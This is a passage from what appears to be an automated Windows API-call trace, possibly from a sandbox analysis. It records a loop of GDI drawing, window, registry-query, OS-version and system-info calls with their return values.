y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.909] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.909] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.909] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.909] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.909] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.909] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.909] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d0401dc [0090.909] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f0401d9 [0090.909] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045990 [0090.909] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045991 [0090.909] CombineRgn (hrgnDst=0x1045990, hrgnSrc1=0x8d0401dc, hrgnSrc2=0x8f0401d9, iMode=1) returned 1 [0090.909] CombineRgn (hrgnDst=0x1045991, hrgnSrc1=0x8d0401dc, hrgnSrc2=0x8f0401d9, iMode=4) returned 2 [0090.909] CreateSolidBrush (color=0xff) returned 0x210598f [0090.909] CreateSolidBrush (color=0xff0000) returned 0x1105992 [0090.909] DeleteObject (ho=0x1105992) returned 1 [0090.909] DeleteObject (ho=0x8f0401d9) returned 1 [0090.909] DeleteObject (ho=0x8d0401dc) returned 1 [0090.909] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.909] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.909] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.909] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.909] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.909] BeginPath (hdc=0x0) returned 0 [0090.909] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.909] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.909] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.910] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.910] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.910] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.910] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x900401d9 [0090.910] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e0401dc [0090.910] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045993 [0090.910] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045994 [0090.910] CombineRgn (hrgnDst=0x1045993, hrgnSrc1=0x900401d9, hrgnSrc2=0x8e0401dc, iMode=1) returned 1 [0090.910] CombineRgn (hrgnDst=0x1045994, hrgnSrc1=0x900401d9, hrgnSrc2=0x8e0401dc, iMode=4) returned 2 [0090.910] CreateSolidBrush (color=0xff) returned 0x2105992 [0090.910] CreateSolidBrush (color=0xff0000) returned 0x1105995 [0090.910] DeleteObject (ho=0x1105995) returned 1 [0090.910] DeleteObject (ho=0x8e0401dc) returned 1 [0090.910] DeleteObject (ho=0x900401d9) returned 1 [0090.910] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.910] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.910] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.910] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.910] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.910] BeginPath (hdc=0x0) returned 0 [0090.910] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.910] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.910] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.910] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.911] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.911] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.911] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f0401dc [0090.911] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x910401d9 [0090.911] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045996 [0090.911] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045997 [0090.911] CombineRgn (hrgnDst=0x1045996, hrgnSrc1=0x8f0401dc, hrgnSrc2=0x910401d9, iMode=1) returned 1 [0090.911] CombineRgn (hrgnDst=0x1045997, hrgnSrc1=0x8f0401dc, hrgnSrc2=0x910401d9, iMode=4) returned 2 [0090.911] CreateSolidBrush (color=0xff) returned 0x2105995 [0090.911] CreateSolidBrush (color=0xff0000) returned 0x1105998 [0090.911] DeleteObject (ho=0x1105998) returned 1 [0090.911] DeleteObject (ho=0x910401d9) returned 1 [0090.911] DeleteObject (ho=0x8f0401dc) returned 1 [0090.911] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.911] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.911] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.911] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.911] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.911] BeginPath (hdc=0x0) returned 0 [0090.911] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.911] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.911] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.911] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.911] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.911] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.911] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.911] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.912] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x920401d9 [0090.912] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x900401dc [0090.912] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045999 [0090.912] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104599a [0090.912] CombineRgn (hrgnDst=0x1045999, hrgnSrc1=0x920401d9, hrgnSrc2=0x900401dc, iMode=1) returned 1 [0090.912] CombineRgn (hrgnDst=0x104599a, hrgnSrc1=0x920401d9, hrgnSrc2=0x900401dc, iMode=4) returned 2 [0090.912] CreateSolidBrush (color=0xff) returned 0x2105998 [0090.912] CreateSolidBrush (color=0xff0000) returned 0x110599b [0090.912] DeleteObject (ho=0x110599b) returned 1 [0090.912] DeleteObject (ho=0x900401dc) returned 1 [0090.912] DeleteObject (ho=0x920401d9) returned 1 [0090.912] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.912] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.912] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.912] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.912] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.912] BeginPath (hdc=0x0) returned 0 [0090.912] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.912] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.912] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.912] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.912] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.912] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.912] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.912] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.912] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x910401dc [0090.912] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x930401d9 [0090.912] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104599c [0090.912] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104599d [0090.913] CombineRgn (hrgnDst=0x104599c, hrgnSrc1=0x910401dc, hrgnSrc2=0x930401d9, iMode=1) returned 1 [0090.913] CombineRgn (hrgnDst=0x104599d, hrgnSrc1=0x910401dc, hrgnSrc2=0x930401d9, iMode=4) returned 2 [0090.913] CreateSolidBrush (color=0xff) returned 0x210599b [0090.913] CreateSolidBrush (color=0xff0000) returned 0x110599e [0090.913] DeleteObject (ho=0x110599e) returned 1 [0090.913] DeleteObject (ho=0x930401d9) returned 1 [0090.913] DeleteObject (ho=0x910401dc) returned 1 [0090.913] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.913] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.913] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.913] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.913] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.913] BeginPath (hdc=0x0) returned 0 [0090.913] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.913] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.913] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.913] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.913] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.913] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.913] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.913] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.913] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x940401d9 [0090.913] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x920401dc [0090.913] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104599f [0090.913] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459a0 [0090.913] CombineRgn (hrgnDst=0x104599f, hrgnSrc1=0x940401d9, hrgnSrc2=0x920401dc, iMode=1) returned 1 [0090.913] CombineRgn (hrgnDst=0x10459a0, hrgnSrc1=0x940401d9, hrgnSrc2=0x920401dc, iMode=4) returned 2 [0090.913] CreateSolidBrush (color=0xff) returned 0x210599e [0090.913] CreateSolidBrush (color=0xff0000) returned 0x11059a1 [0090.913] DeleteObject (ho=0x11059a1) returned 1 [0090.913] DeleteObject (ho=0x920401dc) returned 1 [0090.913] DeleteObject (ho=0x940401d9) returned 1 [0090.913] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.913] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.913] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.914] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.914] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.914] BeginPath (hdc=0x0) returned 0 [0090.914] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.914] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.914] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.914] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.914] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.914] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x930401dc [0090.914] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x950401d9 [0090.914] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459a2 [0090.914] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459a3 [0090.914] CombineRgn (hrgnDst=0x10459a2, hrgnSrc1=0x930401dc, hrgnSrc2=0x950401d9, iMode=1) returned 1 [0090.914] CombineRgn (hrgnDst=0x10459a3, hrgnSrc1=0x930401dc, hrgnSrc2=0x950401d9, iMode=4) returned 2 [0090.914] CreateSolidBrush (color=0xff) returned 0x21059a1 [0090.914] CreateSolidBrush (color=0xff0000) returned 0x11059a4 [0090.914] DeleteObject (ho=0x11059a4) returned 1 [0090.914] DeleteObject (ho=0x950401d9) returned 1 [0090.914] DeleteObject (ho=0x930401dc) returned 1 [0090.914] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.914] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.914] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.914] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.914] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.914] BeginPath (hdc=0x0) returned 0 [0090.914] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.914] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.914] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.914] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.914] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.915] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x960401d9 [0090.915] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x940401dc [0090.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459a5 [0090.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459a6 [0090.915] CombineRgn (hrgnDst=0x10459a5, hrgnSrc1=0x960401d9, hrgnSrc2=0x940401dc, iMode=1) returned 1 [0090.915] CombineRgn (hrgnDst=0x10459a6, hrgnSrc1=0x960401d9, hrgnSrc2=0x940401dc, iMode=4) returned 2 [0090.915] CreateSolidBrush (color=0xff) returned 0x21059a4 [0090.915] CreateSolidBrush (color=0xff0000) returned 0x11059a7 [0090.915] DeleteObject (ho=0x11059a7) returned 1 [0090.915] DeleteObject (ho=0x940401dc) returned 1 [0090.915] DeleteObject (ho=0x960401d9) returned 1 [0090.915] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.915] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.915] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.915] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.915] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.915] BeginPath (hdc=0x0) returned 0 [0090.915] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.915] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.915] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.915] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.915] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.915] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.915] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.915] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.915] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x950401dc [0090.915] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x970401d9 [0090.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459a8 [0090.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459a9 [0090.915] CombineRgn (hrgnDst=0x10459a8, hrgnSrc1=0x950401dc, hrgnSrc2=0x970401d9, iMode=1) returned 1 [0090.915] CombineRgn (hrgnDst=0x10459a9, hrgnSrc1=0x950401dc, hrgnSrc2=0x970401d9, iMode=4) returned 2 [0090.915] CreateSolidBrush (color=0xff) returned 0x21059a7 [0090.915] CreateSolidBrush (color=0xff0000) returned 0x11059aa [0090.915] DeleteObject (ho=0x11059aa) returned 1 [0090.915] DeleteObject (ho=0x970401d9) returned 1 [0090.916] DeleteObject (ho=0x950401dc) returned 1 [0090.916] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.916] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.916] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.916] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.916] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.916] BeginPath (hdc=0x0) returned 0 [0090.916] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.916] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.916] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.916] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.916] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.916] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.916] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.916] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.916] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x980401d9 [0090.916] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x960401dc [0090.916] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ab [0090.916] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ac [0090.916] CombineRgn (hrgnDst=0x10459ab, 